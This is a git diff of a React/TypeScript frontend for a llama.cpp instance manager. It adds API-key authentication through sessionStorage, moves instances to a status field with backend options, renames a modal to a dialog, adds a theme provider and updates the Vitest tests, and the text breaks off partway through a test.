const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } }, { name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } } { name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
] ]
const DUMMY_API_KEY = 'test-api-key-123'
beforeEach(() => { beforeEach(() => {
vi.clearAllMocks() vi.clearAllMocks()
window.sessionStorage.setItem('llamactl_management_key', DUMMY_API_KEY)
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
})
afterEach(() => {
vi.restoreAllMocks()
}) })
describe('Loading State', () => { describe('Loading State', () => {
it('shows loading spinner while instances are being fetched', async () => { it('shows loading spinner while instances are being fetched', () => {
// Mock a delayed response to test loading state // Mock a delayed response to test loading state
vi.mocked(instancesApi.list).mockImplementation(() => vi.mocked(instancesApi.list).mockImplementation(() =>
new Promise(resolve => setTimeout(() => resolve(mockInstances), 100)) new Promise(resolve => setTimeout(() => resolve(mockInstances), 100))
@@ -220,27 +233,5 @@ describe('InstanceList - State Management and UI Logic', () => {
expect(await screen.findByText('Instances (3)')).toBeInTheDocument() expect(await screen.findByText('Instances (3)')).toBeInTheDocument()
expect(screen.queryByText('Loading instances...')).not.toBeInTheDocument() expect(screen.queryByText('Loading instances...')).not.toBeInTheDocument()
}) })
it('handles transition from error back to loaded state', async () => {
// Start with error
vi.mocked(instancesApi.list).mockRejectedValue(new Error('Network error'))
const { rerender } = renderInstanceList(mockEditInstance)
expect(await screen.findByText('Error loading instances')).toBeInTheDocument()
// Simulate recovery (e.g., retry after network recovery)
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
rerender(
<InstancesProvider>
<InstanceList editInstance={mockEditInstance} />
</InstancesProvider>
)
// Should eventually show instances
// Note: This test is somewhat artificial since the context handles retries
expect(screen.getByText('Error loading instances')).toBeInTheDocument()
})
}) })
}) })

View File

@@ -1,23 +1,30 @@
import { describe, it, expect, vi, beforeEach } from 'vitest' import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen, waitFor } from '@testing-library/react' import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceModal from '@/components/InstanceModal' import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => { describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn() const mockOnSave = vi.fn()
const mockOnOpenChange = vi.fn() const mockOnOpenChange = vi.fn()
beforeEach(() => { beforeEach(() => {
vi.clearAllMocks() vi.clearAllMocks()
}) window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
})
afterEach(() => {
vi.restoreAllMocks()
})
describe('Create Mode', () => { describe('Create Mode', () => {
it('validates instance name is required', async () => { it('validates instance name is required', async () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -25,7 +32,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
) )
// Try to submit without name // Try to submit without name
const saveButton = screen.getByTestId('modal-save-button') const saveButton = screen.getByTestId('dialog-save-button')
expect(saveButton).toBeDisabled() expect(saveButton).toBeDisabled()
// Add name, button should be enabled // Add name, button should be enabled
@@ -41,7 +48,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -54,7 +61,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
await user.type(nameInput, 'test instance!') await user.type(nameInput, 'test instance!')
expect(screen.getByText(/can only contain letters, numbers, hyphens, and underscores/)).toBeInTheDocument() expect(screen.getByText(/can only contain letters, numbers, hyphens, and underscores/)).toBeInTheDocument()
expect(screen.getByTestId('modal-save-button')).toBeDisabled() expect(screen.getByTestId('dialog-save-button')).toBeDisabled()
// Clear and test valid name // Clear and test valid name
await user.clear(nameInput) await user.clear(nameInput)
@@ -62,7 +69,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
await waitFor(() => { await waitFor(() => {
expect(screen.queryByText(/can only contain letters, numbers, hyphens, and underscores/)).not.toBeInTheDocument() expect(screen.queryByText(/can only contain letters, numbers, hyphens, and underscores/)).not.toBeInTheDocument()
expect(screen.getByTestId('modal-save-button')).not.toBeDisabled() expect(screen.getByTestId('dialog-save-button')).not.toBeDisabled()
}) })
}) })
@@ -70,7 +77,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -81,16 +88,17 @@ describe('InstanceModal - Form Logic and Validation', () => {
await user.type(screen.getByLabelText(/Instance Name/), 'my-instance') await user.type(screen.getByLabelText(/Instance Name/), 'my-instance')
// Submit form // Submit form
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('my-instance', { expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
it('form resets when modal reopens', async () => { it('form resets when dialog reopens', async () => {
const { rerender } = render( const { rerender } = render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -101,18 +109,18 @@ describe('InstanceModal - Form Logic and Validation', () => {
const nameInput = screen.getByLabelText(/Instance Name/) const nameInput = screen.getByLabelText(/Instance Name/)
await userEvent.setup().type(nameInput, 'temp-name') await userEvent.setup().type(nameInput, 'temp-name')
// Close modal // Close dialog
rerender( rerender(
<InstanceModal <InstanceDialog
open={false} open={false}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
/> />
) )
// Reopen modal // Reopen dialog
rerender( rerender(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -128,17 +136,17 @@ describe('InstanceModal - Form Logic and Validation', () => {
describe('Edit Mode', () => { describe('Edit Mode', () => {
const mockInstance: Instance = { const mockInstance: Instance = {
name: 'existing-instance', name: 'existing-instance',
running: false, status: 'stopped',
options: { options: {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
} }
} }
it('pre-fills form with existing instance data', () => { it('pre-fills form with existing instance data', () => {
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -159,7 +167,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -168,20 +176,20 @@ describe('InstanceModal - Form Logic and Validation', () => {
) )
// Submit without changes // Submit without changes
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', { expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
}) })
}) })
it('shows correct button text for running vs stopped instances', () => { it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true } const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render( const { rerender } = render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -189,10 +197,10 @@ describe('InstanceModal - Form Logic and Validation', () => {
/> />
) )
expect(screen.getByTestId('modal-save-button')).toBeInTheDocument() expect(screen.getByTestId('dialog-save-button')).toBeInTheDocument()
rerender( rerender(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -207,7 +215,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
describe('Auto Restart Configuration', () => { describe('Auto Restart Configuration', () => {
it('shows restart options when auto restart is enabled', () => { it('shows restart options when auto restart is enabled', () => {
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -227,7 +235,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -247,7 +255,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -261,10 +269,11 @@ describe('InstanceModal - Form Logic and Validation', () => {
await user.type(screen.getByLabelText(/Max Restarts/), '5') await user.type(screen.getByLabelText(/Max Restarts/), '5')
await user.type(screen.getByLabelText(/Restart Delay/), '10') await user.type(screen.getByLabelText(/Restart Delay/), '10')
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('test-instance', { expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true, auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5, max_restarts: 5,
restart_delay: 10 restart_delay: 10
}) })
@@ -276,7 +285,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -300,7 +309,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -310,11 +319,12 @@ describe('InstanceModal - Form Logic and Validation', () => {
// Fill only required field // Fill only required field
await user.type(screen.getByLabelText(/Instance Name/), 'clean-instance') await user.type(screen.getByLabelText(/Instance Name/), 'clean-instance')
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
// Should only include non-empty values // Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', { expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -322,7 +332,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -335,11 +345,12 @@ describe('InstanceModal - Form Logic and Validation', () => {
const gpuLayersInput = screen.getByLabelText(/GPU Layers/) const gpuLayersInput = screen.getByLabelText(/GPU Layers/)
await user.type(gpuLayersInput, '15') await user.type(gpuLayersInput, '15')
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', { expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true, auto_restart: true,
gpu_layers: 15, // Should be number, not string backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
}) })
}) })
}) })
@@ -349,14 +360,14 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
/> />
) )
await user.click(screen.getByTestId('modal-cancel-button')) await user.click(screen.getByTestId('dialog-cancel-button'))
expect(mockOnOpenChange).toHaveBeenCalledWith(false) expect(mockOnOpenChange).toHaveBeenCalledWith(false)
}) })
@@ -365,7 +376,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
<InstanceModal <InstanceDialog
open={true} open={true}
onOpenChange={mockOnOpenChange} onOpenChange={mockOnOpenChange}
onSave={mockOnSave} onSave={mockOnSave}
@@ -373,7 +384,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
) )
await user.type(screen.getByLabelText(/Instance Name/), 'test') await user.type(screen.getByLabelText(/Instance Name/), 'test')
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalled() expect(mockOnSave).toHaveBeenCalled()
expect(mockOnOpenChange).toHaveBeenCalledWith(false) expect(mockOnOpenChange).toHaveBeenCalledWith(false)

View File

@@ -0,0 +1,162 @@
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
interface AuthContextState {
isAuthenticated: boolean
isLoading: boolean
apiKey: string | null
error: string | null
}
interface AuthContextActions {
login: (apiKey: string) => Promise<void>
logout: () => void
clearError: () => void
validateAuth: () => Promise<boolean>
}
type AuthContextType = AuthContextState & AuthContextActions
const AuthContext = createContext<AuthContextType | undefined>(undefined)
interface AuthProviderProps {
children: ReactNode
}
const AUTH_STORAGE_KEY = 'llamactl_management_key'
export const AuthProvider = ({ children }: AuthProviderProps) => {
const [isAuthenticated, setIsAuthenticated] = useState(false)
const [isLoading, setIsLoading] = useState(true)
const [apiKey, setApiKey] = useState<string | null>(null)
const [error, setError] = useState<string | null>(null)
// Load auth state from sessionStorage on mount
useEffect(() => {
const loadStoredAuth = async () => {
try {
const storedKey = sessionStorage.getItem(AUTH_STORAGE_KEY)
if (storedKey) {
setApiKey(storedKey)
// Validate the stored key
const isValid = await validateApiKey(storedKey)
if (isValid) {
setIsAuthenticated(true)
} else {
// Invalid key, remove it
sessionStorage.removeItem(AUTH_STORAGE_KEY)
setApiKey(null)
}
}
} catch (err) {
console.error('Error loading stored auth:', err)
// Clear potentially corrupted storage
sessionStorage.removeItem(AUTH_STORAGE_KEY)
} finally {
setIsLoading(false)
}
}
void loadStoredAuth()
}, [])
// Validate API key by making a test request
const validateApiKey = async (key: string): Promise<boolean> => {
try {
const response = await fetch('/api/v1/instances', {
headers: {
'Authorization': `Bearer ${key}`,
'Content-Type': 'application/json'
}
})
return response.ok
} catch (err) {
console.error('Auth validation error:', err)
return false
}
}
const login = useCallback(async (key: string) => {
setIsLoading(true)
setError(null)
try {
// Validate the provided API key
const isValid = await validateApiKey(key)
if (!isValid) {
throw new Error('Invalid API key')
}
// Store the key and update state
sessionStorage.setItem(AUTH_STORAGE_KEY, key)
setApiKey(key)
setIsAuthenticated(true)
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Authentication failed'
setError(errorMessage)
throw new Error(errorMessage)
} finally {
setIsLoading(false)
}
}, [])
const logout = useCallback(() => {
sessionStorage.removeItem(AUTH_STORAGE_KEY)
setApiKey(null)
setIsAuthenticated(false)
setError(null)
}, [])
const clearError = useCallback(() => {
setError(null)
}, [])
const validateAuth = useCallback(async (): Promise<boolean> => {
if (!apiKey) return false
const isValid = await validateApiKey(apiKey)
if (!isValid) {
logout()
}
return isValid
}, [apiKey, logout])
const value: AuthContextType = {
isAuthenticated,
isLoading,
apiKey,
error,
login,
logout,
clearError,
validateAuth,
}
return (
<AuthContext.Provider value={value}>
{children}
</AuthContext.Provider>
)
}
export const useAuth = (): AuthContextType => {
const context = useContext(AuthContext)
if (context === undefined) {
throw new Error('useAuth must be used within an AuthProvider')
}
return context
}
// Helper hook for getting auth headers
export const useAuthHeaders = (): HeadersInit => {
const { apiKey, isAuthenticated } = useAuth()
if (!isAuthenticated || !apiKey) {
return {}
}
return {
'Authorization': `Bearer ${apiKey}`
}
}

View File

@@ -1,7 +1,7 @@
import type { ReactNode } from 'react'; import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
import { createContext, useContext, useState, useEffect, useCallback } from 'react'
import type { CreateInstanceOptions, Instance } from '@/types/instance' import type { CreateInstanceOptions, Instance } from '@/types/instance'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import { useAuth } from '@/contexts/AuthContext'
interface InstancesContextState { interface InstancesContextState {
instances: Instance[] instances: Instance[]
@@ -29,6 +29,7 @@ interface InstancesProviderProps {
} }
export const InstancesProvider = ({ children }: InstancesProviderProps) => { export const InstancesProvider = ({ children }: InstancesProviderProps) => {
const { isAuthenticated, isLoading: authLoading } = useAuth()
const [instancesMap, setInstancesMap] = useState<Map<string, Instance>>(new Map()) const [instancesMap, setInstancesMap] = useState<Map<string, Instance>>(new Map())
const [loading, setLoading] = useState(true) const [loading, setLoading] = useState(true)
const [error, setError] = useState<string | null>(null) const [error, setError] = useState<string | null>(null)
@@ -41,6 +42,11 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
}, []) }, [])
const fetchInstances = useCallback(async () => { const fetchInstances = useCallback(async () => {
if (!isAuthenticated) {
setLoading(false)
return
}
try { try {
setLoading(true) setLoading(true)
setError(null) setError(null)
@@ -57,7 +63,7 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
} finally { } finally {
setLoading(false) setLoading(false)
} }
}, []) }, [isAuthenticated])
const updateInstanceInMap = useCallback((name: string, updates: Partial<Instance>) => { const updateInstanceInMap = useCallback((name: string, updates: Partial<Instance>) => {
setInstancesMap(prev => { setInstancesMap(prev => {
@@ -106,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.start(name) await instancesApi.start(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance') setError(err instanceof Error ? err.message : 'Failed to start instance')
} }
@@ -118,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.stop(name) await instancesApi.stop(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: false }) updateInstanceInMap(name, { status: "stopped" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance') setError(err instanceof Error ? err.message : 'Failed to stop instance')
} }
@@ -130,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.restart(name) await instancesApi.restart(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance') setError(err instanceof Error ? err.message : 'Failed to restart instance')
} }
@@ -154,9 +160,19 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
} }
}, []) }, [])
// Only fetch instances when auth is ready and user is authenticated
useEffect(() => { useEffect(() => {
fetchInstances() if (!authLoading) {
}, [fetchInstances]) if (isAuthenticated) {
void fetchInstances()
} else {
// Clear instances when not authenticated
setInstancesMap(new Map())
setLoading(false)
setError(null)
}
}
}, [authLoading, isAuthenticated, fetchInstances])
const value: InstancesContextType = { const value: InstancesContextType = {
instances, instances,

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}

View File

@@ -1,12 +1,14 @@
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest' import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
import { render, screen, waitFor } from '@testing-library/react' import { render, screen, waitFor } from "@testing-library/react";
import type { ReactNode } from 'react' import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from '@/contexts/InstancesContext' import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from '@/lib/api' import { instancesApi } from "@/lib/api";
import type { Instance } from '@/types/instance' import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module // Mock the API module
vi.mock('@/lib/api', () => ({ vi.mock("@/lib/api", () => ({
instancesApi: { instancesApi: {
list: vi.fn(), list: vi.fn(),
create: vi.fn(), create: vi.fn(),
@@ -15,8 +17,8 @@ vi.mock('@/lib/api', () => ({
stop: vi.fn(), stop: vi.fn(),
restart: vi.fn(), restart: vi.fn(),
delete: vi.fn(), delete: vi.fn(),
} },
})) }));
// Test component to access context // Test component to access context
function TestComponent() { function TestComponent() {
@@ -30,366 +32,391 @@ function TestComponent() {
stopInstance, stopInstance,
restartInstance, restartInstance,
deleteInstance, deleteInstance,
clearError clearError,
} = useInstances() } = useInstances();
return ( return (
<div> <div>
<div data-testid="loading">{loading.toString()}</div> <div data-testid="loading">{loading.toString()}</div>
<div data-testid="error">{error || 'no-error'}</div> <div data-testid="error">{error || "no-error"}</div>
<div data-testid="instances-count">{instances.length}</div> <div data-testid="instances-count">{instances.length}</div>
{instances.map(instance => ( {instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}> <div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()} {instance.name}:{instance.status}
</div> </div>
))} ))}
{/* Action buttons for testing with specific instances */} {/* Action buttons for testing with specific instances */}
<button <button
onClick={() => createInstance('new-instance', { model: 'test.gguf' })} onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance" data-testid="create-instance"
> >
Create Instance Create Instance
</button> </button>
<button <button
onClick={() => updateInstance('instance1', { model: 'updated.gguf' })} onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance" data-testid="update-instance"
> >
Update Instance Update Instance
</button> </button>
<button <button
onClick={() => startInstance('instance2')} onClick={() => startInstance("instance2")}
data-testid="start-instance" data-testid="start-instance"
> >
Start Instance2 Start Instance2
</button> </button>
<button <button
onClick={() => stopInstance('instance1')} onClick={() => stopInstance("instance1")}
data-testid="stop-instance" data-testid="stop-instance"
> >
Stop Instance1 Stop Instance1
</button> </button>
<button <button
onClick={() => restartInstance('instance1')} onClick={() => restartInstance("instance1")}
data-testid="restart-instance" data-testid="restart-instance"
> >
Restart Instance1 Restart Instance1
</button> </button>
<button <button
onClick={() => deleteInstance('instance2')} onClick={() => deleteInstance("instance2")}
data-testid="delete-instance" data-testid="delete-instance"
> >
Delete Instance2 Delete Instance2
</button> </button>
<button <button onClick={clearError} data-testid="clear-error">
onClick={clearError}
data-testid="clear-error"
>
Clear Error Clear Error
</button> </button>
</div> </div>
) );
} }
function renderWithProvider(children: ReactNode) { function renderWithProvider(children: ReactNode) {
return render( return render(
<InstancesProvider> <AuthProvider>
{children} <InstancesProvider>{children}</InstancesProvider>
</InstancesProvider> </AuthProvider>
) );
} }
describe('InstancesContext', () => { describe("InstancesContext", () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'instance1', running: true, options: { model: 'model1.gguf' } }, { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: 'instance2', running: false, options: { model: 'model2.gguf' } } { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
] ];
beforeEach(() => { beforeEach(() => {
vi.clearAllMocks() vi.clearAllMocks();
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123');
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })));
// Default successful API responses // Default successful API responses
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances) vi.mocked(instancesApi.list).mockResolvedValue(mockInstances);
}) });
afterEach(() => { afterEach(() => {
vi.clearAllMocks() vi.restoreAllMocks();
}) });
describe('Initial Loading', () => { describe("Initial Loading", () => {
it('loads instances on mount', async () => { it("loads instances on mount", async () => {
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
// Should start loading // Should start loading
expect(screen.getByTestId('loading')).toHaveTextContent('true') expect(screen.getByTestId("loading")).toHaveTextContent("true");
// Should fetch instances // Should fetch instances
await waitFor(() => { await waitFor(() => {
expect(instancesApi.list).toHaveBeenCalledOnce() expect(instancesApi.list).toHaveBeenCalledOnce();
}) });
// Should display loaded instances // Should display loaded instances
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true') expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false') "instance1:running"
}) );
}) expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:stopped"
);
});
});
it('handles API error during initial load', async () => { it("handles API error during initial load", async () => {
const errorMessage = 'Network error' const errorMessage = "Network error";
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
expect(screen.getByTestId('instances-count')).toHaveTextContent('0') expect(screen.getByTestId("instances-count")).toHaveTextContent("0");
}) });
}) });
}) });
describe('Create Instance', () => { describe("Create Instance", () => {
it('creates instance and adds it to state', async () => { it("creates instance and adds it to state", async () => {
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-instance', name: "new-instance",
running: false, status: "stopped",
options: { model: 'test.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
} };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-instance', { model: 'test.gguf' }) expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
}) backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId('instance-new-instance')).toHaveTextContent('new-instance:false') expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
}) "new-instance:stopped"
}) );
});
});
it('handles create instance error without changing state', async () => { it("handles create instance error without changing state", async () => {
